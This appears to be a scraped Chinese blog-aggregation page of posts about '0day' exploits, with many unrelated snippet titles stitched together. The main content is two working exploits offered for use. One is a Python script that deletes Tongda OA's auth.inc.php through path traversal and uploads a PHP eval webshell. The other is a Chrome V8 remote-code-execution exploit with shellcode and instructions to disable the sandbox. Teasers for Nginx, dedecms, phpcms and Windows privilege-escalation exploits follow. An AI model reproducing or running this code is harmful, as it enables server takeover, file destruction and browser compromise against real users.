精华内容
下载资源
问答
  • 通达OA 最新0day RCE 漏洞 附带EXP

    千次阅读 2020-08-19 12:35:08
    通达OA 最新0day RCE 漏洞 关注时间,老版本不行 新版的概率大,具体影响范围自行测试 亲测存在 exp利用脚本 来源于网络 禁止进行非法攻击 仅用于工作和学习,禁止用于非法攻击,非法传播 import requests target=...

    通达OA 最新0day RCE 漏洞

    此漏洞会删除文件 可能损坏OA系统
    要有授权!别瞎搞和批量了

    关注时间,老版本不行

    11.6 版本可

    具体影响范围自行测试

    亲测存在

    image-20200819123228685

    exp利用脚本

    来源于网络

    禁止进行非法攻击

    仅用于工作和学习,禁止用于非法攻击,非法传播

    import requests
     
    target="http://127.0.0.1:8888/"
    payload="<?php eval($_POST['test']);?>"
    print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
    input("Press enter to continue")
    print("[*]Deleting auth.inc.php....")
     
    url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
    requests.get(url=url)
    print("[*]Checking if file deleted...")
    url=target+"/inc/auth.inc.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[-]Failed to deleted auth.inc.php")
        exit(-1)
    print("[+]Successfully deleted auth.inc.php!")
    print("[*]Uploading payload...")
    url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
    files = {'FILE1': ('test.php', payload)}
    requests.post(url=url,files=files)
    url=target+"/_test.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[+]Filed Uploaded Successfully")
        print("[+]URL:",url)
    else:
        print("[-]Failed to upload file")
    
    展开全文
  • chrome 最新0day复现

    2021-04-16 00:03:35
    Chrome 0day 远程代码执行漏洞复现 1.测试环境 浏览器版本 90.0.4430.72 操作系统 windows 7 2. 利用条件:关闭沙箱 3. 利用过程 打开chrome属性 在目标输入框最后添加 –no-sandbox 点击应用 4. 使用 chrome ...

    2021/4/15 Chrome 0day 远程代码执行漏洞复现

    1.测试环境

    浏览器版本 90.0.4430.72
    操作系统 windows 7
    在这里插入图片描述

    2. 利用条件:关闭沙箱

    3. 利用过程

    1. 打开chrome属性
    2. 在目标输入框最后添加 –no-sandbox
    3. 点击应用

    图1
    4. 使用 chrome 打开 准备好的poc,弹出记事本
    在这里插入图片描述

    exp1 链接
    exp2 链接
    本人测试后感觉 exp1 适用性广,仅供参考。

    4. 预防措施

    1. 开启沙箱模式,不要关闭沙箱模式(默认沙箱模式开启)。
    2. 可以使用 firefox 浏览器等非V8引擎的浏览器,浏览器版本及引擎查看可以参考这篇文章

    参考文章

    1. Chrome V8引擎远程代码执行0day漏洞安全风险通告
    2. Chrome 远程代码执行漏洞复现 (2021年4月13日)
    3. 最新Chrome远程代码执行0Day
    展开全文
  • Chrmoe远程代码执行(最新0Day漏洞复现)漏洞介绍漏洞复现 本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 漏洞介绍 2021年04月13日,国外安全研究员发布了Chrome远程代码执行0Day漏洞的...

    Chrmoe远程代码执行(最新0Day漏洞复现)


    本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担

    漏洞介绍

    2021年04月13日,国外安全研究员发布了Chrome远程代码执行0Day漏洞的POC详情
    Chrome是四大浏览器内核之一,统称为Chromium内核或Chrome内核。chrome是开放源代码的,目前采用Chrome内核的浏览器有著名的Google Chrome、360极速、搜狗、新版opera、yandex还有微软旗下Microsoft Edge等,总之,chrome内核在浏览器份额中,占比非常大
    漏洞会影响当前版本的Google Chrome,Microsoft Edge和其他可能基于Chromium的浏览器。不过需要关闭浏览器的沙盒,也就是说,chrome的沙盒可以拦截该远程代码执行漏洞,并且目前Google chrome最新版本 90.0.4430.72已经被修复

    漏洞复现

    1. 搭建环境 Windows 10(192.168.216.219),Google chrome 89.0.4389.114版本,攻击机kali(192.168.216.165),注意,影响版本是Google:Chrome: <=89.0.4389.114,我还测试了89.0.4389.128,漏洞不存在
      Google chrome提取码:u7bn
      在这里插入图片描述
    2. 漏洞验证
      链接
      此脚本是打开Windows 10的计算器
      exploit.js
    /*
    BSD 2-Clause License
    Copyright (c) 2021, rajvardhan agarwal
    All rights reserved.
    Redistribution and use in source and binary forms, with or without
    modification, are permitted provided that the following conditions are met:
    3. Redistributions of source code must retain the above copyright notice, this
       list of conditions and the following disclaimer.
    4. Redistributions in binary form must reproduce the above copyright notice,
       this list of conditions and the following disclaimer in the documentation
       and/or other materials provided with the distribution.
    THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
    AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
    IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
    DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
    FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
    DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
    SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
    CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
    OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
    OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    */
    
    var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
    var wasm_mod = new WebAssembly.Module(wasm_code);
    var wasm_instance = new WebAssembly.Instance(wasm_mod);
    var f = wasm_instance.exports.main;
    
    var buf = new ArrayBuffer(8);
    var f64_buf = new Float64Array(buf);
    var u64_buf = new Uint32Array(buf);
    let buf2 = new ArrayBuffer(0x150);
    
    function ftoi(val) {
        f64_buf[0] = val;
        return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
    }
    
    function itof(val) {
        u64_buf[0] = Number(val & 0xffffffffn);
        u64_buf[1] = Number(val >> 32n);
        return f64_buf[0];
    }
    
    const _arr = new Uint32Array([2**31]);
    
    function foo(a) {
        var x = 1;
            x = (_arr[0] ^ 0) + 1;
    
            x = Math.abs(x);
            x -= 2147483647;
            x = Math.max(x, 0);
    
            x -= 1;
            if(x==-1) x = 0;
    
            var arr = new Array(x);
            arr.shift();
            var cor = [1.1, 1.2, 1.3];
    
            return [arr, cor];
    }
    
    for(var i=0;i<0x3000;++i)
        foo(true);
    
    var x = foo(false);
    var arr = x[0];
    var cor = x[1];
    
    const idx = 6;
    arr[idx+10] = 0x4242;
    
    function addrof(k) {
        arr[idx+1] = k;
        return ftoi(cor[0]) & 0xffffffffn;
    }
    
    function fakeobj(k) {
        cor[0] = itof(k);
        return arr[idx+1];
    }
    
    var float_array_map = ftoi(cor[3]);
    
    var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
    var fake = fakeobj(addrof(arr2) + 0x20n);
    
    function arbread(addr) {
        if (addr % 2n == 0) {
            addr += 1n;
        }
        arr2[1] = itof((2n << 32n) + addr - 8n);
        return (fake[0]);
    }
    
    function arbwrite(addr, val) {
        if (addr % 2n == 0) {
            addr += 1n;
        }
        arr2[1] = itof((2n << 32n) + addr - 8n);
        fake[0] = itof(BigInt(val));
    }
    
    function copy_shellcode(addr, shellcode) {
        let dataview = new DataView(buf2);
        let buf_addr = addrof(buf2);
        let backing_store_addr = buf_addr + 0x14n;
        arbwrite(backing_store_addr, addr);
    
        for (let i = 0; i < shellcode.length; i++) {
            dataview.setUint32(4*i, shellcode[i], true);
        }
    }
    
    var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
    console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
    var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
    copy_shellcode(rwx_page_addr, shellcode);
    f();
    

    exploit.html

    <script src="exploit.js"></script>
    

    将两个脚本放入到Windows 10中,并且两个脚本必须在同一目录下,当然你可以更改exploit.html中调用的js路径
    在这里插入图片描述
    找到Google chrome浏览器的快捷方式,更改快捷方式中的目标,加上--no-sandbox,意思是启动Google chrome 不用沙箱
    在这里插入图片描述
    然后用Google chrome的快捷方式打开浏览器,注意,打开浏览器后会出现–no-sandbox这一行,如果没有,则漏洞复现会失败
    在这里插入图片描述
    点击回车,成功弹出计算器,漏洞复现成功
    在这里插入图片描述

    展开全文
  • window2003登录框通杀最新0day
  • Office最新0day漏洞 所有Word版本受影响 -E安全 与大多数文档相关的漏洞不同,这个尚未修复的零日漏洞并不依赖宏。因为在打开启动宏的文件时,Office通常会警告用户这类文件存在风险,而该漏...

    4月10日讯 安全研究人员指出,攻击者正利用Microsoft Word中先前未披露的漏洞秘密安装各种恶意软件,即便电脑打了安全补丁,也无济于事。

    Office最新0day漏洞 所有Word版本受影响 -E安全

    与大多数文档相关的漏洞不同,这个尚未修复的零日漏洞并不依赖宏。因为在打开启动宏的文件时,Office通常会警告用户这类文件存在风险,而该漏洞“机智”的避开了这一点。

    相反,受害者打开任意一个欺骗性Word文档时就会触发该漏洞。欺骗性Word文档从服务器下载一个恶意HTML应用程序,伪装成富文本文档作为诱饵,该恶意HTML应用程序就会下载并运行恶意脚本,秘密安装恶意软件。

    McAfee的研究人员上周五首次发布漏洞报告,并称,由于HTML应用是可执行的,攻击者可以在受感染的电脑上运行代码,同时还能避开基于内存的缓解措施(旨在阻止这些攻击)。

    安全公司FireEye上周六也发布了类似的报告。

    FireEye称,之所以推迟公开披露,是因为公司在跟微软协调相关工作。该漏洞与Windows 对象连接与嵌入(OLE)功能有关,OLE功能允许应用程序连接并嵌入内容到其它文档,主要用于Office和Windows的内置文档查看器WordPad。过去几年OLE功能一直是众多漏洞的原因所在。

    研究人员指出,所有Office版本中都存在该漏洞,并且能被利用,包括Windows 10运行的最新版Office 2016。自1月以来,就出现利用该漏洞的攻击。

    目前尚不清楚,微软是否会在“周二补丁日”修订该零日漏洞。

    本文转自d1net(转载)

    展开全文
  • 安全公司SentinelOne今天宣布,OS X安全研究人员Pedro Vilaça,最近发现了当前Mac OS X版本的1个0day漏洞。这名研究人员将此问题描述为non-memory corruption issue,攻击者可在任意目标设备上执行远程代码,随后...
  • asp.net最新0day_exp

    2011-12-16 17:30:21
    asp.net最新0day_exp
  • Nginx最新0day

    2011-09-02 08:57:00
    昨晚黑锅在微博上发了老外爆的Nginx漏洞,开始并没几个人关注,小我马上架环境测试验证了,我人品好随手在网上试了两个网站也验证了这个漏洞,于是乎马上就在微博上传开了。 这个漏洞是7月20日发的,老外做了非常...
  • 建站之星最新0DAY

    2013-01-30 22:59:57
    作者:honker90  //code public function save_profile() { $user_info =@ ParamHolder::get('user', array());//获取数组 if (sizeof($user_info) <= 0) { $this->assign('json', Toolkit::js
  • dedecms织梦最新0day

    2011-08-12 13:46:00
    拿webshell的方法如下: 网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell. 前题条件,必须准备好自己的dede数据库,然后插入数据: ...@fwrite($fp, ...
  •  ,就可以找到受漏洞影响的最新版本:Struts 2.3.15( struts-2.3.15-all.zip ),我们就下载这个压缩包。下载完成之后,我们就可以生成Demo项目了: 这里我们首先介绍一种最简单的方法:将上面的压缩包解压...
  • windows最新0day(webshell)

    2010-04-28 18:40:54
    win最新本地提权0day webshell版暂时没打补丁的还有很多。赶快利用
  • syWebEditor编辑器存在上传漏洞,也是解析的问题,跟其它出现这漏洞的 编辑器一样。 exp:http://www.tmdsb.com/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif%7C
  • 最新批量***dedecms|dedecms最新0day 代码如下: http://www.google.com.hk/#hl=zh-CN&newwindow=1&safe=strict&q=inurl:backupdata*dede_admin&oq=inurl:backupdata*dede_admin&aq=f&aqi...
  • windows最新0day 通杀所有版本通杀 XP 2K 2K3 2K8 VISTA WIN7用法:以普通用户登录windows执行exp 弹出一个cmdshell 这个shell即为 system权限的Win-ver-exploit Exploit : KiTrap0D.rar (316 K) 下载地址:...
  • phpcms 2008最新0day加批量EXP代码

    千次阅读 2011-12-16 08:40:53
    &z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZnAgPSBAZm9wZW4oJ2Z1Y2sucGhwJywgJ2EnKTsgDQoNQGZ3cml0ZSgkZnAsJzw%2...
  • 0DAY代码: From:digua # Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit# EDB-ID: 12516# CVE-ID: ()# OSVDB-ID: ()# Author: Lufeng Li and Qingshan Li# Published: 2010-05-06# V...
  • 存在17年的漏洞编译至今通杀测试英文版系统user提权没问题中文有的...windows最新0day 通杀所有版本通杀 XP 2K 2K3 2K8 VISTA WIN7用法:以普通用户登录 windows执行exp 弹出一个cmdshell 这个shell即为 system权限...
  • excel 最新0day漏洞

    千次阅读 2006-07-07 11:49:00
    Excel 2000/XP/2003 Style 0day POCPOChttp://www.hitcon.org/Nanika.xlsDescription:A vulnerability has been discovered in Microsoft Excel, which can be exploited by /malicious people to compromise a user
  • 【复现】最新Chrome远程代码执行0Day

    千次阅读 2021-04-13 15:21:44
    但还是要注意,网上的html文件或链接不要轻易点开,否则有你哭的时候 poc: https://github.com/r4j0x00/exploits/tree/master/chrome-0day 复现演示视频请在公众号中查看 复现时的踩坑点: 1、右键浏览器快捷方式-...
  • 大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!...2021年04月13日,360CERT监测发现国外安全研究员发布了Chrome 远程代码执行 0Day的POC详情, 漏洞等级:严重 漏洞评分:9.
  • 最新护网周期内每个相关人员的弦都是紧绷的,今天偶然获得一个0day随即来复现一下子。也思考了一下该漏洞造成的危害和具体的利用方式,如有奇思妙想欢迎私聊。 2.复现过程截图 使用快捷方式获取到浏览器安装位置,...
  • ECShop 2.7.2 最新任意用户登陆漏洞0day

    千次阅读 2016-11-25 17:14:11
    ECShop 2.7.2 最新任意用户登陆漏洞0day (2015-04-02 16:07:28) 转载▼     由于最近项目需要, 查看了下商派最新发布的ECShop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 468
精华内容 187
关键字:

最新0day